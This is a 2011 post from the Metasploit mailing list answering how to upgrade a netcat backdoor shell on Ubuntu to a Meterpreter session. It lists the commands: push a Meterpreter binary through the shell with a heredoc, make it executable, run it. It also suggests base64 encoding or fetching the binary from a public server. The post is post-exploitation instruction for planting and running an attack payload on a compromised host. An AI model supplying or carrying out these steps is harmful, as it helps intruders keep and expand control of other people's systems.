Metasploit mailing list archives

Re: Backboor with Netcat and Meterpreter


From: Nicolas Braud-Santoni <nicolas () braud-santoni eu>
Date: Sat, 9 Jul 2011 22:04:57 +0200

Le Fri, 8 Jul 2011 15:36:33 +0000 (UTC),
Rafael Negron <rnegron13 () comcast net> a écrit :

all I' m trying to accomplish is a session upgrade from a basic
netcat backdoor on Ubuntu Linux to a meterpreter session.

- Create a (statically linked) Meterpreter binary.
- In your netcat shell : cat > x << EOF
  then send the contents of the binary
  then send (on a separate line) EOF
- chmod 0755 x
- ./x
- Enjoy

If the binary is corrupted, try encoding it in base64 then decoding it
on the remote machine, or downloading it from a public HTTP(S) or FTP
server.


Hoping it helps,

Nicolas

Attachment: signature.asc
Description:

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: